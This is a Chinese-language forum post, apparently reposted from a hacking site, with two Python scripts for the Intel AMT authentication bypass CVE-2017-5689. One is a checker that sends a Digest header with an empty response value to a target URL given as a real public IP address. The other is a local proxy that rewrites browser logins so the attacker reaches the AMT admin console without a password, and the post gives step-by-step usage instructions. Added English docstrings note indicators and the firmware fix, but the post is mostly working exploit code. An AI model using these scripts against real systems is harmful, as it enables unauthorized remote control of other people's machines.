CVE-2017-5689(Intel产品AMT)利用小脚本

检测脚本如下,使用方法: python CVE-2017-5689.py http://1.245.154.138:16992/index.htm


#!/usr/bin/python
# -*- coding: utf-8 -*-
#by hackteam.cn
import requests

def exploit(url):
    """Probe ``url`` for the CVE-2017-5689 Intel AMT authentication bypass.

    Sends one unauthenticated GET to obtain the server's Digest
    ``WWW-Authenticate`` challenge, then replays the challenge text as an
    ``Authorization`` header in which the Digest ``response`` field is the
    empty string.  A second GET answered with HTTP 200 is reported as a hit.

    Args:
        url: Full URL of the AMT web UI page to check; ``__main__`` passes
            ``argv[1]`` (e.g. ``http://<host>:16992/index.htm``).

    Returns:
        ``True`` when the replayed request is answered with status 200,
        ``False`` otherwise.

    Raises:
        AttributeError: when the first response has no ``WWW-Authenticate``
            header (``.replace`` is called on ``None``).  Network errors
            propagate from ``requests`` unchanged.

    Defender notes: the on-the-wire indicator is a Digest ``Authorization``
    header whose ``response`` value is empty, which a correct Digest
    implementation must reject.  Remediation is the vendor firmware update
    for this CVE plus blocking the AMT web ports from untrusted networks.
    """
    status = False
    headers = {"User-Agent": "Mozilla/5.0"}
    httprsp = requests.get(url, headers=headers)
    www_authenticate = httprsp.headers.get('WWW-Authenticate')
    # The challenge's stale="false" token is swapped for the client-side Digest
    # fields with an empty response value; if the token is absent the
    # challenge is replayed unchanged.
    www_authenticate = www_authenticate.replace(
        'stale="false"',
        'username="admin",response="",uri="/index.htm",nc="00000001",cnonce="60513ab58858482c"'
    )
    headers.update({"Authorization": www_authenticate})
    httprsp = requests.get(url, headers=headers)
    #print httprsp.status_code
    # A requests.Response is falsy for 4xx/5xx, so a rejected replay already
    # returns False here before the explicit 200 check.
    if not httprsp: return status
    if not httprsp.headers: return status
    if httprsp.status_code == 200: status = True
    return status


if __name__ == "__main__":
    # CLI entry point: exactly one positional argument, the AMT UI URL.
    import sys
    if len(sys.argv) != 2:
        # NOTE: the example URL in the usage text has a typo ("http:.//");
        # the intended form is "http://".
        print "[+] Usage: python {} <http:.//192.168.1.100:16992/index.htm>".format(sys.argv[0])
        sys.exit(1)

    url = sys.argv[1]
    # One line of output per target: [success] when the replay got a 200.
    if exploit(url):
        print "[success] CVE-2017-5689 - {}".format(url)
    else:
        print "[failed]  CVE-2017-5689 - {}".format(url)


效果如下:

1.png


利用脚本如下,运行此脚本,浏览器设置代理为你x.x.x.x:8090,访问目标网站,用户名输入admin,密码可以不用输入,然后就可以进到控制界面,http://1.245.154.138:16992/index.htm.


#!/usr/bin/env python
# -*- coding: utf-8 -*-
#by hackteam.cn

import sys
import socket
import os
import tornado.httpclient
import tornado.httpserver
import tornado.ioloop
import tornado.web
import re
from urlparse import urlparse

def get_proxy(url):
    """Return the proxy URL configured for ``url``'s scheme, or ``None``.

    The environment key is ``<scheme>_proxy`` (e.g. ``http_proxy``); a URL
    without a scheme is treated as ``http``.
    """
    scheme = urlparse(url, scheme='http').scheme
    return os.environ.get(scheme + '_proxy')

def parse_proxy(proxy):
    """Split a proxy URL into ``(hostname, port)``.

    Both values are whatever ``urlparse`` extracts (``http`` assumed when no
    scheme is present); ``port`` is ``None`` when the URL carries none.
    """
    parts = urlparse(proxy, scheme='http')
    host = parts.hostname
    port = parts.port
    return host, port

def fetch_request(url, callback, **kwargs):
    """Issue an asynchronous fetch of ``url`` and pass the response to ``callback``.

    When an environment proxy applies to ``url``'s scheme, the curl-based
    client is selected and ``proxy_host``/``proxy_port`` are added to the
    request keyword arguments.  ``raise_error=False`` means failures are
    delivered inside the response object rather than raised.
    """
    proxy_url = get_proxy(url)
    if proxy_url:
        # presumably the curl client is selected because it honours the
        # proxy_* request options — TODO confirm against the tornado version in use
        tornado.httpclient.AsyncHTTPClient.configure(
            'tornado.curl_httpclient.CurlAsyncHTTPClient')
        kwargs['proxy_host'], kwargs['proxy_port'] = parse_proxy(proxy_url)
    request = tornado.httpclient.HTTPRequest(url, **kwargs)
    tornado.httpclient.AsyncHTTPClient().fetch(request, callback, raise_error=False)

class ProxyHandler(tornado.web.RequestHandler):
    """Forwarding HTTP proxy that rewrites the client's Digest ``Authorization`` header.

    Plain requests are relayed upstream through ``fetch_request`` (``get``;
    ``post`` delegates to it).  ``CONNECT`` opens a raw TCP tunnel in
    ``connect``, so tunnelled (typically TLS) traffic passes through
    untouched.  Before a plain request is forwarded, a Digest
    ``Authorization`` header has its ``response`` value emptied and the
    hop-by-hop ``Proxy-Connection`` header is dropped.  Written against
    tornado 4.x on Python 2 (``@tornado.web.asynchronous`` and the
    callback-style client API).

    Defender notes: an empty Digest ``response`` value is never valid and is
    a simple network-level indicator for requests shaped by this proxy; on
    the AMT side the remediation is the vendor firmware update for
    CVE-2017-5689.
    """
    # Only get, post and connect are implemented below; the other listed
    # methods fall through to RequestHandler's default handling.
    SUPPORTED_METHODS = ("GET", "HEAD", "POST", "DELETE", "PATCH", "PUT",
                         "OPTIONS", "CONNECT")
    @tornado.web.asynchronous
    def get(self):
        """Relay a non-CONNECT request upstream and stream the reply back.

        ``handle_response`` copies status, reason and headers from the
        upstream response (framing headers excluded), writes the body when
        there is one and finishes the response; a transport-level failure
        is reported as a 500 with the error text in the body.
        """
        def handle_response(response):
            # An HTTPError carries a real upstream status and is relayed
            # as-is; any other error means the fetch itself failed.
            if (response.error and not
                    isinstance(response.error, tornado.httpclient.HTTPError)):
                self.set_status(500)
                self.write('Internal server error:\n' + str(response.error))
            else:
                self.set_status(response.code, response.reason)
                self._headers = tornado.httputil.HTTPHeaders() # clear tornado default headers so only upstream's are relayed
                for header, v in response.headers.get_all():
                    # Framing headers are not copied; Content-Length is set from the body below.
                    if header not in ('Content-Length', 'Transfer-Encoding', 'Content-Encoding', 'Connection'):
                        self.add_header(header, v) # some headers appear multiple times, eg 'Set-Cookie'

                if response.body:
                    self.set_header('Content-Length', len(response.body))
                    self.write(response.body)
            self.finish()

        # An empty request body is forwarded as None rather than b''.
        body = self.request.body
        if not body:
            body = None
        try:
            myheader= self.request.headers
            # Digest rewrite: the client's response="<hex>" field is replaced
            # by response="" before the header is forwarded.
            if "Authorization" in myheader:
                username_pattern=re.compile(r'username=".*?"')
                response_pattern=re.compile(r'response="[0-9a-f]+?"')
                out = re.sub(username_pattern, 'username="admin"', myheader["Authorization"])
                out = re.sub(response_pattern, 'response=""', myheader["Authorization"])
                myheader["Authorization"]=out

            # Proxy-Connection is a hop-by-hop header addressed to this proxy,
            # not to the origin server.
            if 'Proxy-Connection' in self.request.headers:
                del self.request.headers['Proxy-Connection']
            fetch_request(
                self.request.uri,
                handle_response,
                method=self.request.method,
                body=body,
                headers=myheader,
                request_timeout=5,
                follow_redirects=False,
                allow_nonstandard_methods=True)
        except tornado.httpclient.HTTPError as httperror:
            # NOTE(review): on_response is not defined on this class, so the
            # first branch would raise AttributeError if it were ever reached.
            if hasattr(httperror, 'response') and httperror.response:
                self.on_response(httperror.response)
            else:
                self.set_status(500)
                self.write('Internal server error:\n' + str(httperror))
                self.finish()

    @tornado.web.asynchronous
    def post(self):
        """POST is relayed exactly like GET; ``get`` reads the body itself."""
        self.get()

    @tornado.web.asynchronous
    def connect(self):
        """Handle ``CONNECT`` by opening a raw TCP tunnel to ``host:port``.

        Without an environment proxy the upstream socket is connected
        directly; once connected, both read loops are registered and
        ``200 Connection established`` is written to the client, after
        which bytes are copied in both directions until either side closes.
        With a ``*_proxy`` variable set, a CONNECT is first issued to that
        proxy and the tunnel only starts if its status line is 200.  Bytes
        inside the tunnel are opaque here; the header rewriting in ``get``
        does not apply to them.
        """
        # CONNECT's request-target is "host:port"; any other shape fails
        # this unpack with ValueError.
        host, port = self.request.uri.split(':')
        client = self.request.connection.stream

        # The closures below reference ``upstream``, which is bound further down.
        def read_from_client(data):
            upstream.write(data)

        def read_from_upstream(data):
            client.write(data)

        # Each close callback flushes any trailing data, then closes the
        # peer stream (no-op if the peer is already closed).
        def client_close(data=None):
            if upstream.closed():
                return
            if data:
                upstream.write(data)
            upstream.close()

        def upstream_close(data=None):
            if client.closed():
                return
            if data:
                client.write(data)
            client.close()

        def start_tunnel():
            # Both read loops are registered before the 200 goes to the client.
            client.read_until_close(client_close, read_from_client)
            upstream.read_until_close(upstream_close, read_from_upstream)
            client.write(b'HTTP/1.0 200 Connection established\r\n\r\n')

        def on_proxy_response(data=None):
            # Upstream-proxy reply: only a 200 status line opens the tunnel;
            # anything else (or no data) is reported to the client as a 500.
            if data:
                first_line = data.splitlines()[0]
                http_v, status, text = first_line.split(None, 2)
                if int(status) == 200:
                    start_tunnel()
                    return
            self.set_status(500)
            self.finish()

        def start_proxy_tunnel():
            # Chained CONNECT through the configured proxy, then wait for its
            # status line and headers.
            upstream.write('CONNECT %s HTTP/1.1\r\n' % self.request.uri)
            upstream.write('Host: %s\r\n' % self.request.uri)
            upstream.write('Proxy-Connection: Keep-Alive\r\n\r\n')
            upstream.read_until('\r\n\r\n', on_proxy_response)

        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
        # NOTE(review): tornado.iostream is not imported at the top of this
        # file; this relies on tornado.web having loaded it as a side effect.
        upstream = tornado.iostream.IOStream(s)

        proxy = get_proxy(self.request.uri)
        if proxy:
            proxy_host, proxy_port = parse_proxy(proxy)
            upstream.connect((proxy_host, proxy_port), start_proxy_tunnel)
        else:
            upstream.connect((host, int(port)), start_tunnel)

if __name__ == '__main__':
    # Entry point: one catch-all route to ProxyHandler on port 8090 (the port
    # the article tells the browser to use).  No bind address is passed to
    # listen(), so tornado's default applies — presumably all interfaces;
    # bind to 127.0.0.1 instead if the proxy should only serve a local browser.
    port = 8090
    print "Starting Proxy on port 8090!"
    handlers = [(r'.*', ProxyHandler),]
    app = tornado.web.Application(handlers=handlers)
    app.listen(port)
    tornado.ioloop.IOLoop.instance().start()


效果如下:

2.png

注意:利用脚本需要tornado模块,下载此模块tornado-4.5.1.tar.gz

然后本地设置代理127.0.0.1:8090然后访问目标即可

转自:https://www.t00ls.net/thread-39820-1-1.html
